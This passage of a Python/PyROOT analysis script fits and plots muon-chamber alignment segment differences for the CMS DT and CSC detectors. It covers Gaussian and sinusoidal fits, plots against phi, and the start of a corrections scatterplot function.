        tmpneg.SetXTitle("#Delta(r#phi)^{local} (mm)")
        f.SetParNames("#Delta(r#phi)^{local}_{0}", "Slope")
    if component == "csc_slope":
        tmpprof.SetXTitle("q/p_{z} (c/GeV)")
        tmpprof.SetYTitle("#Deltad(r#phi)/dz^{local} (mrad)")
        tmppos.SetXTitle("#Deltad(r#phi)/dz^{local} (mrad)")
        tmpneg.SetXTitle("#Deltad(r#phi)/dz^{local} (mrad)")
        f.SetParNames("#Deltad(r#phi)/dz^{local}_{0}", "Slope")

    tmpprof.GetXaxis().CenterTitle()
    tmpprof.GetYaxis().CenterTitle()
    tmppos.GetXaxis().CenterTitle()
    tmpneg.GetXaxis().CenterTitle()
    if component[0:2] == "dt":
        tmpprof.SetTitle("MB%d - MB%d, wheel %d, sector %02d" % (station1, station2, int(wheel), int(sector)))
    elif component[0:3] == "csc":
        tmpprof.SetTitle("ME%d - ME%d, for ME%s%d/%d/%d" % (station1, station2, endcapsign, station2, ring, chamber))
    else: raise Exception
    tmppos.SetTitle("Positive muons")
    tmpneg.SetTitle("Negative muons")

    # left pad: profile with linear fit; right pads: charge-split distributions
    c1.Clear()
    c1.Divide(2, 1)
    c1.GetPad(1).cd()
    fit1 = tmpprof.Fit("p1", "qS")
    tmpprof.Draw("e1")
    c1.GetPad(2).cd()
    c1.GetPad(2).Divide(1, 2)
    c1.GetPad(2).GetPad(1).cd()
    tmppos.Draw()
    # normalized Gaussian, fitted only within one RMS of the mean
    f = ROOT.TF1("gausR", "[0]*exp(-(x - [1])**2 / 2. / [2]**2) / sqrt(2.*3.1415926) / [2]",
                 tmppos.GetMean() - tmppos.GetRMS(), tmppos.GetMean() + tmppos.GetRMS())
    f.SetParameters(tmppos.GetEntries() * ((10. - -10.)/100.), tmppos.GetMean(), tmppos.GetRMS())
    f.SetParNames("Constant", "Mean", "Sigma")
    fit2 = tmppos.Fit("gausR", "qRS")
    c1.GetPad(2).GetPad(2).cd()
    tmpneg.Draw()
    f = ROOT.TF1("gausR", "[0]*exp(-(x - [1])**2 / 2. / [2]**2) / sqrt(2.*3.1415926) / [2]",
                 tmpneg.GetMean() - tmpneg.GetRMS(), tmpneg.GetMean() + tmpneg.GetRMS())
    f.SetParameters(tmpneg.GetEntries() * ((10. - -10.)/100.), tmpneg.GetMean(), tmpneg.GetRMS())
    f.SetParNames("Constant", "Mean", "Sigma")
    fit3 = tmpneg.Fit("gausR", "qRS")

    # a fit counts as good only if it converged with an accurate covariance matrix
    fit1ok = fit1.Status()==0 and fit1.CovMatrixStatus()==3
    fit2ok = fit2.Status()==0 and fit2.CovMatrixStatus()==3
    fit3ok = fit3.Status()==0 and fit3.CovMatrixStatus()==3

    fitresult1 = None, None
    if fit1ok:
        fitresult1 = tmpprof.GetFunction("p1").GetParameter(0), tmpprof.GetFunction("p1").GetParError(0)
    fitresult2 = None, None
    if fit2ok and fit3ok:
        # average of the two charge peaks; error combined in quadrature
        fitresult2 = (tmppos.GetFunction("gausR").GetParameter(1) + tmpneg.GetFunction("gausR").GetParameter(1)) / 2., \
                     sqrt(tmppos.GetFunction("gausR").GetParError(1)**2 + tmpneg.GetFunction("gausR").GetParError(1)**2) / 2.
    return phi, fitresult1[0], fitresult1[1], fitresult2[0], fitresult2[1], fit1ok, fit2ok, fit3ok
##################################################################################
def segdiff_xalign(tfiles, component, **args):
    """Fit DT-CSC cross-alignment x-difference distributions for one sector.

    Reads the positive- and negative-muon histograms for one DT station /
    CSC station pairing (and optionally a second CSC station), sums them
    over all files in tfiles, draws them on the global canvas c1 and fits
    a restricted-range Gaussian to each.

    Arguments:
      tfiles    -- list of open ROOT files with the monitoring output
      component -- e.g. "x_dt1_csc" (DT station is component[4])
      args      -- wheel, sector, cscstations ("1" or "12"); optional:
                   window (accepted for interface symmetry with segdiff,
                   currently unused here)

    Returns a dict with "phi", "fit_ok", and on success "fit_peak" /
    "fit_peak_error" (entry-weighted average of the two charge peaks);
    when two CSC stations are requested also the "_2" variants.  If the
    histograms are empty, only "phi" and "fit_ok" (False) are present.
    """
    tdrStyle.SetOptFit(1)
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.05)
    tdrStyle.SetStatW(0.2)
    tdrStyle.SetStatY(0.9)
    tdrStyle.SetStatFontSize(0.06)

    if component[0:4] == "x_dt":
        wheel = int(args["wheel"])
        if int(wheel)<0:
            wheell = "m%d" % abs(wheel)
            endcapsign="-"
        else:
            wheell = "p%d" % abs(wheel)
            endcapsign="+"
        station_dt = component[4]
        station_csc_1 = args["cscstations"][0]
        # ME1 pairs with ring 3, ME2+ with ring 2
        if station_csc_1=='1': ring_1 = 3
        else: ring_1 = 2
        sector = args["sector"]
        profname = "%s%s_W%sS%02d" % (component, station_csc_1, wheell, sector)
        posname_1 = "pos_" + profname
        negname_1 = "neg_" + profname
        if len(args["cscstations"]) > 1:
            station_csc_2 = args["cscstations"][1]
            if station_csc_2=='1': ring_2 = 3
            else: ring_2 = 2
            profname = "%s%s_W%sS%02d" % (component, station_csc_2, wheell, sector)
            posname_2 = "pos_" + profname
            negname_2 = "neg_" + profname

        phi = signConventions["DT", wheel, int(station_dt), sector][4]
        while (phi < -pi): phi += 2.*pi
        while (phi > pi): phi -= 2.*pi
    else: raise Exception

    if "window" in args: window = args["window"]
    else: window = 5.

    global tmppos, tmpneg, tmppos_2, tmpneg_2
    pdir = "AlignmentMonitorSegmentDifferences/iter1/"
    tmppos = tfiles[0].Get(pdir + posname_1).Clone()
    tmpneg = tfiles[0].Get(pdir + negname_1).Clone()
    if len(args["cscstations"]) > 1:
        tmppos_2 = tfiles[0].Get(pdir + posname_2).Clone()
        tmpneg_2 = tfiles[0].Get(pdir + negname_2).Clone()
    for tfile in tfiles[1:]:
        tmppos.Add(tfile.Get(pdir + posname_1))
        tmpneg.Add(tfile.Get(pdir + negname_1))
        if len(args["cscstations"]) > 1:
            tmppos_2.Add(tfile.Get(pdir + posname_2))
            tmpneg_2.Add(tfile.Get(pdir + negname_2))
    # Rebin only AFTER accumulating all files: TH1::Add requires identical
    # binning, so rebinning first would silently drop data from tfiles[1:]
    # (which is what the original code did for the first station pair).
    tmpneg.Rebin(2); tmppos.Rebin(2)
    if len(args["cscstations"]) > 1:
        tmpneg_2.Rebin(2); tmppos_2.Rebin(2)

    result = {}
    result["fit_ok"] = False
    result["phi"] = phi
    ntot = tmppos.GetEntries() + tmpneg.GetEntries()
    if ntot == 0:
        return result

    tmppos.SetXTitle("#Deltax^{loc}_{MB} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{ME} (mm)")
    tmpneg.SetXTitle("#Deltax^{loc}_{MB} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{ME} (mm)")
    title1 = "MB(W%+d St%s Sec%d) - ME%s%s/%d" % (wheel, station_dt, int(sector), endcapsign, station_csc_1, ring_1)
    tmppos.SetTitle("Positive #mu: %s" % title1)
    tmpneg.SetTitle("Negative #mu: %s" % title1)
    tmppos.GetXaxis().CenterTitle()
    tmpneg.GetXaxis().CenterTitle()
    if len(args["cscstations"]) > 1:
        tmppos.SetXTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
        tmpneg.SetXTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
        title2 = "MB(W%+d St%s Sec%d) - ME%s%s/%d" % (wheel, station_dt, int(sector), endcapsign, station_csc_2, ring_2)
        tmppos_2.SetTitle("Positive #mu: %s" % title2)
        tmpneg_2.SetTitle("Negative #mu: %s" % title2)
        tmppos_2.GetXaxis().CenterTitle()
        tmpneg_2.GetXaxis().CenterTitle()

    # 2x2 canvas: first pair on the left column, second pair on the right;
    # each histogram is fitted with a Gaussian within one RMS of its mean
    c1.Clear()
    c1.Divide(2, 2)
    c1.GetPad(1).cd()
    tmppos.Draw()
    fpos = ROOT.TF1("gpos", "gaus", tmppos.GetMean() - tmppos.GetRMS(), tmppos.GetMean() + tmppos.GetRMS())
    fpos.SetParameters(tmppos.GetEntries() * 2.5, tmppos.GetMean(), tmppos.GetRMS())
    fit_pos = tmppos.Fit("gpos", "qRS")
    c1.GetPad(3).cd()
    tmpneg.Draw()
    fneg = ROOT.TF1("gneg", "gaus", tmpneg.GetMean() - tmpneg.GetRMS(), tmpneg.GetMean() + tmpneg.GetRMS())
    fneg.SetParameters(tmpneg.GetEntries() * 2.5, tmpneg.GetMean(), tmpneg.GetRMS())
    fit_neg = tmpneg.Fit("gneg", "qRS")

    result["fit_ok"] = (fit_pos.Status()==0 and fit_pos.CovMatrixStatus()==3 and fit_neg.Status()==0 and fit_neg.CovMatrixStatus()==3)
    # entry-weighted average of the positive and negative peak positions
    result["fit_peak"] = (fpos.GetParameter(1)*tmppos.GetEntries() + fneg.GetParameter(1)*tmpneg.GetEntries()) / ntot
    result["fit_peak_error"] = sqrt( (fpos.GetParError(1)*tmppos.GetEntries())**2 + (fneg.GetParError(1)*tmpneg.GetEntries())**2) / ntot

    if len(args["cscstations"]) > 1:
        c1.GetPad(2).cd()
        tmppos_2.Draw()
        fpos_2 = ROOT.TF1("gpos2", "gaus", tmppos_2.GetMean() - tmppos_2.GetRMS(), tmppos_2.GetMean() + tmppos_2.GetRMS())
        fpos_2.SetParameters(tmppos_2.GetEntries() * 2.5, tmppos_2.GetMean(), tmppos_2.GetRMS())
        fit_pos_2 = tmppos_2.Fit("gpos2", "qRS")
        c1.GetPad(4).cd()
        tmpneg_2.Draw()
        fneg_2 = ROOT.TF1("gneg2", "gaus", tmpneg_2.GetMean() - tmpneg_2.GetRMS(), tmpneg_2.GetMean() + tmpneg_2.GetRMS())
        fneg_2.SetParameters(tmpneg_2.GetEntries() * 2.5, tmpneg_2.GetMean(), tmpneg_2.GetRMS())
        fit_neg_2 = tmpneg_2.Fit("gneg2", "qRS")

        result["fit_ok_2"] = (fit_pos_2.Status()==0 and fit_pos_2.CovMatrixStatus()==3 and fit_neg_2.Status()==0 and fit_neg_2.CovMatrixStatus()==3)
        ntot = tmppos_2.GetEntries() + tmpneg_2.GetEntries()
        result["fit_peak_2"] = (fpos_2.GetParameter(1)*tmppos_2.GetEntries() + fneg_2.GetParameter(1)*tmpneg_2.GetEntries()) / ntot
        result["fit_peak_error_2"] = sqrt( (fpos_2.GetParError(1)*tmppos_2.GetEntries())**2 + (fneg_2.GetParError(1)*tmpneg_2.GetEntries())**2) / ntot

    return result
##################################################################################
def segdiffvsphi_xalign(tfiles, wheel, window=10.):
    """Plot DT-CSC x-alignment segment differences versus phi for one wheel.

    For each of the 12 DT sectors, runs segdiff_xalign() for the MB1-ME1/3,
    MB1-ME2/2 and MB2-ME1/3 pairings, plots the fitted peaks versus the MB
    chamber's phi on the global canvas c1, and fits A + B sin(phi) + C cos(phi)
    to the MB1 and MB2 graphs; the fit parameters are quoted as equivalent
    ME1/3 ring corrections.  Graphs, legend and labels are stored in globals
    so ROOT does not garbage-collect them while the canvas is alive.
    """
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.05)

    global htemp, gtemp_12, gtemp_21, gtemp_11, tlegend
    htemp = ROOT.TH1F("htemp", "", 1, -pi, pi)
    gtemp_11_phi, gtemp_11_val, gtemp_11_err = [], [], []
    gtemp_12_phi, gtemp_12_val, gtemp_12_err = [], [], []
    gtemp_21_phi, gtemp_21_val, gtemp_21_err = [], [], []
    for sector in xrange(1, 12+1):
        # "_11" = MB1 vs ME1/3, "_12" = MB1 vs ME2/2, "_21" = MB2 vs ME1/3
        r1 = segdiff_xalign(tfiles, "x_dt1_csc", wheel=wheel, sector=sector, cscstations = "12")
        r2 = segdiff_xalign(tfiles, "x_dt2_csc", wheel=wheel, sector=sector, cscstations = "1")

        if r1["fit_ok"]:
            gtemp_11_phi.append(r1["phi"])
            gtemp_11_val.append(r1["fit_peak"])
            gtemp_11_err.append(r1["fit_peak_error"])
        # "fit_ok_2" is absent when segdiff_xalign returned early on empty
        # histograms, so probe it with .get() instead of indexing
        if r1.get("fit_ok_2", False):
            gtemp_12_phi.append(r1["phi"])
            gtemp_12_val.append(r1["fit_peak_2"])
            gtemp_12_err.append(r1["fit_peak_error_2"])
        if r2["fit_ok"]:
            gtemp_21_phi.append(r2["phi"])
            gtemp_21_val.append(r2["fit_peak"])
            gtemp_21_err.append(r2["fit_peak_error"])

    if len(gtemp_11_phi) > 0:
        gtemp_11 = ROOT.TGraphErrors(len(gtemp_11_phi), array.array("d", gtemp_11_phi), array.array("d", gtemp_11_val),
                                     array.array("d", [0.] * len(gtemp_11_phi)), array.array("d", gtemp_11_err))
    if len(gtemp_12_phi) > 0:
        gtemp_12 = ROOT.TGraphErrors(len(gtemp_12_phi), array.array("d", gtemp_12_phi), array.array("d", gtemp_12_val),
                                     array.array("d", [0.] * len(gtemp_12_phi)), array.array("d", gtemp_12_err))
    # fixed: this guard used to (incorrectly) test gtemp_11_phi, so gtemp_21
    # could be styled/drawn below without ever being (re)created
    if len(gtemp_21_phi) > 0:
        gtemp_21 = ROOT.TGraphErrors(len(gtemp_21_phi), array.array("d", gtemp_21_phi), array.array("d", gtemp_21_val),
                                     array.array("d", [0.] * len(gtemp_21_phi)), array.array("d", gtemp_21_err))

    if len(gtemp_11_phi) > 0:
        gtemp_11.SetMarkerStyle(20); gtemp_11.SetMarkerSize(1.5);
        gtemp_11.SetMarkerColor(ROOT.kRed); gtemp_11.SetLineColor(ROOT.kRed)
    if len(gtemp_12_phi) > 0:
        gtemp_12.SetMarkerStyle(22); gtemp_12.SetMarkerSize(1.);
        gtemp_12.SetMarkerColor(ROOT.kGreen+2); gtemp_12.SetLineColor(ROOT.kGreen+2)
    if len(gtemp_21_phi) > 0:
        gtemp_21.SetMarkerStyle(21); gtemp_21.SetMarkerSize(1.5);
        gtemp_21.SetMarkerColor(ROOT.kBlue); gtemp_21.SetLineColor(ROOT.kBlue)

    htemp.SetTitle("Wheel %+d" % wheel)
    htemp.SetAxisRange(-window, window, "Y")
    htemp.SetXTitle("#phi of MB")
    htemp.SetYTitle("#Deltax^{loc}_{DT} - r_{DT}/r_{CSC}#times#Deltax^{loc}_{CSC} (mm)")
    htemp.GetXaxis().CenterTitle()
    htemp.GetYaxis().CenterTitle()
    htemp.GetYaxis().SetTitleOffset(0.75)

    c1.Clear()
    htemp.Draw()
    if len(gtemp_12_phi) > 0:
        gtemp_12.Draw("p")
    if len(gtemp_21_phi) > 0:
        gtemp_21.Draw("p")
    if len(gtemp_11_phi) > 0:
        gtemp_11.Draw("p")

    tlegend = ROOT.TLegend(0.59, 0.75, 0.99, 0.92)
    tlegend.SetBorderSize(0)
    tlegend.SetFillColor(ROOT.kWhite)
    if len(gtemp_11_phi) > 0:
        tlegend.AddEntry(gtemp_11, "MB1 - ME1/3 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_11_val), stdev(gtemp_11_val)), "pl")
    if len(gtemp_21_phi) > 0:
        tlegend.AddEntry(gtemp_21, "MB2 - ME1/3 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_21_val), stdev(gtemp_21_val)), "pl")
    if len(gtemp_12_phi) > 0:
        tlegend.AddEntry(gtemp_12, "MB1 - ME2/2 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_12_val), stdev(gtemp_12_val)), "pl")
    tlegend.Draw()

    # sinusoidal fits: the constant term maps to a ring rotation, the sin/cos
    # amplitudes to x/y ring offsets
    f_11 = ROOT.TF1("f11", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
    f_11.SetLineColor(ROOT.kRed)
    f_11.SetLineWidth(2)
    f_21 = ROOT.TF1("f21", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
    f_21.SetLineColor(ROOT.kBlue)
    f_21.SetLineWidth(2)
    if len(gtemp_11_phi) > 0:
        gtemp_11.Fit(f_11,"")
    if len(gtemp_21_phi) > 0:
        gtemp_21.Fit(f_21,"")

    global f_txt,f_11_txt, f_21_txt
    f_txt = ROOT.TLatex(-2.9, -0.7*window, "ME1/3 ring corrections equivalents:")
    f_txt.SetTextSize(0.028)
    f_txt.Draw()
    if len(gtemp_11_phi) > 0:
        rdt = signConventions[("DT", 2, 1, 1)][3]*10
        f_11_txt = ROOT.TLatex(-2.9, -0.8*window, "#Deltax=%.2f#pm%.2f mm #Deltay=%.2f#pm%.2f mm #Delta#phi_{z}=%.2f#pm%.2f mrad" % (
                   -f_11.GetParameter(1), f_11.GetParError(1), f_11.GetParameter(2), f_11.GetParError(2), -f_11.GetParameter(0)/rdt*1000, f_11.GetParError(0)/rdt*1000))
        f_11_txt.SetTextSize(0.028)
        f_11_txt.SetTextColor(ROOT.kRed)
        f_11_txt.Draw()
    # fixed: this guard used to test gtemp_11_phi, quoting f_21 parameters
    # even when the MB2 graph was never fitted
    if len(gtemp_21_phi) > 0:
        rdt = signConventions[("DT", 2, 2, 1)][3]*10
        f_21_txt = ROOT.TLatex(-2.9, -0.9*window, "#Deltax=%.2f#pm%.2f mm #Deltay=%.2f#pm%.2f mm #Delta#phi_{z}=%.2f#pm%.2f mrad" % (
                   -f_21.GetParameter(1), f_21.GetParError(1), f_21.GetParameter(2), f_21.GetParError(2), -f_21.GetParameter(0)/rdt*1000, f_21.GetParError(0)/rdt*1000))
        f_21_txt.SetTextSize(0.028)
        f_21_txt.SetTextColor(ROOT.kBlue)
        f_21_txt.Draw()
##################################################################################
def segdiffvsphi(tfiles, reports, component, wheel, window=5., excludesectors=()):
    """Summarize DT station-pair segment differences versus phi for one wheel.

    For every sector whose two chambers of a pair both have a "PASS" report,
    segdiff() is run for MB1-MB2, MB2-MB3 and (for "dt13" components) MB3-MB4,
    and the fitted offsets are plotted against the average phi of the pair on
    the global canvas c1.  Filled markers show the profile-fit intercept, open
    markers the averaged Gaussian peak.  Graphs and legend live in globals so
    ROOT keeps them alive with the canvas.
    """
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.05)

    global htemp, gtemp_12, gtemp2_12, gtemp_23, gtemp2_23, gtemp_34, gtemp2_34, tlegend
    htemp = ROOT.TH1F("htemp", "", 1, -pi, pi)

    # per-pair accumulators: phi, profile value/error, peak value/error
    acc = {}
    for pair in (12, 23, 34):
        acc[pair] = {"phi": [], "val": [], "err": [], "val2": [], "err2": []}

    def lookup(station, sect):
        # first report addressed to this chamber, or None if absent
        for rep in reports:
            if rep.postal_address == ("DT", wheel, station, sect):
                return rep
        return None

    pairs = [12, 23]
    if component[:4] == "dt13":
        pairs.append(34)

    for sect in xrange(1, 12+1):
        if sect in excludesectors:
            continue
        for pair in pairs:
            sta1, sta2 = divmod(pair, 10)
            rep1 = lookup(sta1, sect)
            rep2 = lookup(sta2, sect)
            if rep1 is None or rep2 is None:
                continue
            if rep1.status != "PASS" or rep2.status != "PASS":
                continue
            phi, val, err, val2, err2, ok1, ok2, ok3 = segdiff(tfiles, component, pair, wheel=wheel, sector=sect)
            if ok1 and ok2 and ok3:
                a = acc[pair]
                a["phi"].append(phi)
                a["val"].append(val)
                a["err"].append(err)
                a["val2"].append(val2)
                a["err2"].append(err2)

    def mkgraph(phis, vals, errs):
        # TGraphErrors with zero x-errors from parallel python lists
        npts = len(phis)
        return ROOT.TGraphErrors(npts, array.array("d", phis), array.array("d", vals),
                                 array.array("d", [0.] * npts), array.array("d", errs))

    if acc[12]["phi"]:
        gtemp_12 = mkgraph(acc[12]["phi"], acc[12]["val"], acc[12]["err"])
        gtemp2_12 = mkgraph(acc[12]["phi"], acc[12]["val2"], acc[12]["err2"])
    if acc[23]["phi"]:
        gtemp_23 = mkgraph(acc[23]["phi"], acc[23]["val"], acc[23]["err"])
        gtemp2_23 = mkgraph(acc[23]["phi"], acc[23]["val2"], acc[23]["err2"])
    if acc[34]["phi"]:
        gtemp_34 = mkgraph(acc[34]["phi"], acc[34]["val"], acc[34]["err"])
        gtemp2_34 = mkgraph(acc[34]["phi"], acc[34]["val2"], acc[34]["err2"])

    # filled marker = profile fit, open marker = peak average; one color per pair
    if acc[12]["phi"]:
        for graph, marker in ((gtemp_12, 20), (gtemp2_12, 24)):
            graph.SetMarkerStyle(marker)
            graph.SetMarkerSize(1.)
            graph.SetMarkerColor(ROOT.kBlue)
            graph.SetLineColor(ROOT.kBlue)
    if acc[23]["phi"]:
        for graph, marker in ((gtemp_23, 21), (gtemp2_23, 25)):
            graph.SetMarkerStyle(marker)
            graph.SetMarkerSize(1.)
            graph.SetMarkerColor(ROOT.kRed)
            graph.SetLineColor(ROOT.kRed)
    if acc[34]["phi"] and component[:4] == "dt13":
        for graph, marker in ((gtemp_34, 22), (gtemp2_34, 26)):
            graph.SetMarkerStyle(marker)
            graph.SetMarkerSize(1.25)
            graph.SetMarkerColor(ROOT.kGreen+2)
            graph.SetLineColor(ROOT.kGreen+2)

    htemp.SetTitle("Wheel %d" % wheel if wheel == 0 else "Wheel %+d" % wheel)
    htemp.SetAxisRange(-window, window, "Y")
    htemp.SetXTitle("Average #phi of pair (rad)")
    ytitle = {"dt13_resid": "#Deltax^{local} (mm)",
              "dt13_slope": "#Deltadx/dz^{local} (mrad)",
              "dt2_resid": "#Deltay^{local} (mm)",
              "dt2_slope": "#Deltady/dz^{local} (mrad)"}.get(component)
    if ytitle is not None:
        htemp.SetYTitle(ytitle)
    htemp.GetXaxis().CenterTitle()
    htemp.GetYaxis().CenterTitle()
    htemp.GetYaxis().SetTitleOffset(0.75)

    c1.Clear()
    htemp.Draw()
    if acc[12]["phi"]:
        gtemp_12.Draw("p")
        gtemp2_12.Draw("p")
    if acc[23]["phi"]:
        gtemp_23.Draw("p")
        gtemp2_23.Draw("p")
    if acc[34]["phi"]:
        gtemp_34.Draw("p")
        gtemp2_34.Draw("p")

    tlegend = ROOT.TLegend(0.5, 0.72, 0.9, 0.92)
    tlegend.SetBorderSize(0)
    tlegend.SetFillColor(ROOT.kWhite)
    if acc[12]["phi"]:
        tlegend.AddEntry(gtemp_12, "MB1 - MB2 (mean: %4.2f, RMS: %4.2f)" % (mean(acc[12]["val"]), stdev(acc[12]["val"])), "pl")
    if acc[23]["phi"]:
        tlegend.AddEntry(gtemp_23, "MB2 - MB3 (mean: %4.2f, RMS: %4.2f)" % (mean(acc[23]["val"]), stdev(acc[23]["val"])), "pl")
    if acc[34]["phi"]:
        tlegend.AddEntry(gtemp_34, "MB3 - MB4 (mean: %4.2f, RMS: %4.2f)" % (mean(acc[34]["val"]), stdev(acc[34]["val"])), "pl")
    if acc[12]["phi"]:
        allvals = acc[12]["val"] + acc[23]["val"] + acc[34]["val"]
        tlegend.AddEntry(gtemp_12, "total mean: %4.2f, total RMS: %4.2f" % (mean(allvals), stdev(allvals)), "")
    tlegend.Draw()
##################################################################################
def segdiffvsphicsc(tfiles, component, pair, window=5., **args):
    """Plot CSC segment differences between two adjacent stations vs. chamber phi.

    tfiles    : open ROOT files with the residuals histograms (forwarded to segdiff)
    component : "csc_resid" or "csc_slope"; must start with "csc"
    pair      : two-digit station pair, e.g. 12 for ME1-ME2 (stations must be adjacent)
    window    : half-width of the displayed y range
    args      : must contain endcap="p" (plus) or "m" (minus)

    Fills the module-level htemp/gtemp_*/tlegend objects and draws on the
    global canvas c1.
    """
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.05)

    # BUG FIX: the original check read "if not component[0:3] == 'csc': Exception",
    # which only evaluates the Exception class and silently accepts bad input.
    if not component[0:3] == "csc": raise Exception

    endcap = args["endcap"]
    if endcap == "m":
        endcapsign = "-"
    elif endcap == "p":
        endcapsign = "+"
    else:
        raise Exception

    # pair is a two-digit number: first digit = inner station, second = outer
    station1 = int(str(pair)[0])
    station2 = int(str(pair)[1])
    if not station2 - station1 == 1: raise Exception

    # station 4 has only ring 1 available for pairing
    rings = [1, 2]
    if station2 == 4: rings = [1]

    global htemp, gtemp_1, gtemp2_1, gtemp_2, gtemp2_2, tlegend

    # dummy frame histogram covering the full phi range
    htemp = ROOT.TH1F("htemp", "", 1, -pi*5./180., pi*(2.-5./180.))
    gtemp_1_phi, gtemp_1_val, gtemp_1_err, gtemp_1_val2, gtemp_1_err2 = [], [], [], [], []
    gtemp_2_phi, gtemp_2_val, gtemp_2_err, gtemp_2_val2, gtemp_2_err2 = [], [], [], [], []

    for ring in rings:
        # ring 1 has 18 chambers, ring 2 has 36
        chambers = xrange(1, 37)
        if ring == 1: chambers = xrange(1, 19)
        for chamber in chambers:
            phi, val, err, val2, err2, fit1, fit2, fit3 = \
                segdiff(tfiles, component, pair, endcap=endcap, ring=ring, chamber=chamber)
            # keep the point only if all three fits converged
            if fit1 and fit2 and fit3:
                if ring == 1:
                    gtemp_1_phi.append(phi)
                    gtemp_1_val.append(val)
                    gtemp_1_err.append(err)
                    gtemp_1_val2.append(val2)
                    gtemp_1_err2.append(err2)
                if ring == 2:
                    gtemp_2_phi.append(phi)
                    gtemp_2_val.append(val)
                    gtemp_2_err.append(err)
                    gtemp_2_val2.append(val2)
                    gtemp_2_err2.append(err2)

    if len(gtemp_1_phi) > 0:
        gtemp_1 = ROOT.TGraphErrors(len(gtemp_1_phi), array.array("d", gtemp_1_phi), array.array("d", gtemp_1_val),
                                    array.array("d", [0.] * len(gtemp_1_phi)), array.array("d", gtemp_1_err))
        gtemp2_1 = ROOT.TGraphErrors(len(gtemp_1_phi), array.array("d", gtemp_1_phi), array.array("d", gtemp_1_val2),
                                     array.array("d", [0.] * len(gtemp_1_phi)), array.array("d", gtemp_1_err2))
    if len(gtemp_2_phi) > 0:
        gtemp_2 = ROOT.TGraphErrors(len(gtemp_2_phi), array.array("d", gtemp_2_phi), array.array("d", gtemp_2_val),
                                    array.array("d", [0.] * len(gtemp_2_phi)), array.array("d", gtemp_2_err))
        gtemp2_2 = ROOT.TGraphErrors(len(gtemp_2_phi), array.array("d", gtemp_2_phi), array.array("d", gtemp_2_val2),
                                     array.array("d", [0.] * len(gtemp_2_phi)), array.array("d", gtemp_2_err2))

    # filled markers: primary fit values; open markers: alternative fit values
    if len(gtemp_1_phi) > 0:
        gtemp_1.SetMarkerStyle(20); gtemp_1.SetMarkerSize(1.)
        gtemp_1.SetMarkerColor(ROOT.kBlue); gtemp_1.SetLineColor(ROOT.kBlue)
        gtemp2_1.SetMarkerStyle(24); gtemp2_1.SetMarkerSize(1.)
        gtemp2_1.SetMarkerColor(ROOT.kBlue); gtemp2_1.SetLineColor(ROOT.kBlue)
    if len(gtemp_2_phi) > 0:
        gtemp_2.SetMarkerStyle(21); gtemp_2.SetMarkerSize(1.)
        gtemp_2.SetMarkerColor(ROOT.kRed); gtemp_2.SetLineColor(ROOT.kRed)
        gtemp2_2.SetMarkerStyle(25); gtemp2_2.SetMarkerSize(1.)
        gtemp2_2.SetMarkerColor(ROOT.kRed); gtemp2_2.SetLineColor(ROOT.kRed)

    htemp.SetTitle("ME%s%d - ME%s%d" % (endcapsign, station2, endcapsign, station1))
    htemp.SetAxisRange(-window, window, "Y")
    htemp.SetXTitle("Average #phi of pair (rad)")
    if component == "csc_resid": htemp.SetYTitle("#Delta(r#phi)^{local} (mm)")
    if component == "csc_slope": htemp.SetYTitle("#Deltad(r#phi)/dz^{local} (mrad)")
    htemp.GetXaxis().CenterTitle()
    htemp.GetYaxis().CenterTitle()
    htemp.GetYaxis().SetTitleOffset(0.75)

    c1.Clear()
    htemp.Draw()
    if len(gtemp_1_phi) > 0:
        gtemp_1.Draw("p")
        gtemp2_1.Draw("p")
    if len(gtemp_2_phi) > 0:
        gtemp_2.Draw("p")
        gtemp2_2.Draw("p")

    tlegend = ROOT.TLegend(0.5, 0.72, 0.9, 0.92)
    tlegend.SetBorderSize(0)
    tlegend.SetFillColor(ROOT.kWhite)
    if len(gtemp_1_phi) > 0:
        tlegend.AddEntry(gtemp_1, "ring 1 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_1_val), stdev(gtemp_1_val)), "pl")
    if len(gtemp_2_phi) > 0:
        tlegend.AddEntry(gtemp_2, "ring 2 (mean: %4.2f, RMS: %4.2f)" % (mean(gtemp_2_val), stdev(gtemp_2_val)), "pl")
    tlegend.Draw()
##################################################################################
# makes a scatterplot of corrections coming either from reports (if xml geometries are None)
# or from geometryX and geometryY (WRT the common initial geometry0)
def corrections2D(reportsX=None, reportsY=None, geometry0=None, geometryX=None, geometryY=None,
                  window=25., selection=None, name="tmp", canvas=None, pre_title_x=None, pre_title_y=None,
                  which="110011"):
    """Scatterplot of alignment corrections from two sources against each other.

    Input is either two report lists (reportsX vs. reportsY) or two geometries
    (geometryX, geometryY) compared with respect to the same starting
    geometry0.  One pad per coordinate (x, y, z, phix, phiy, phiz) is drawn,
    selected by the 6-bit binary mask `which`; each pad also shows the
    principal-component (PCA) axis and the correlation coefficient.
    Returns aaa, the per-coordinate list of [valueX, valueY] pairs.
    """
    tdrStyle.SetOptStat(0)
    tdrStyle.SetStatW(0.40)
    # determine what are we plotting: report vs report or xml vs xml
    mode = None
    check_reports = False
    if reportsX is not None and reportsY is not None:
        mode = "reports"
        check_reports = True
    if geometry0 is not None and geometryX is not None and geometryY is not None:
        mode = "xmls"
    if mode is None:
        print "Either couple of reports or three geometries have to be given as input. Exiting..."
        return
    # setup ranges with the maximum [-window,window] that later will be optimized to [-wnd_adaptive,wnd_adaptive]
    wnd = [window]*6
    wnd_adaptive = [.1]*6
    global hx, hy, hz, hphix, hphiy, hphiz
    bins=2000
    hx = ROOT.TH2F("%s_x" % name, "", bins, -wnd[0], wnd[0], bins, -wnd[0], wnd[0])
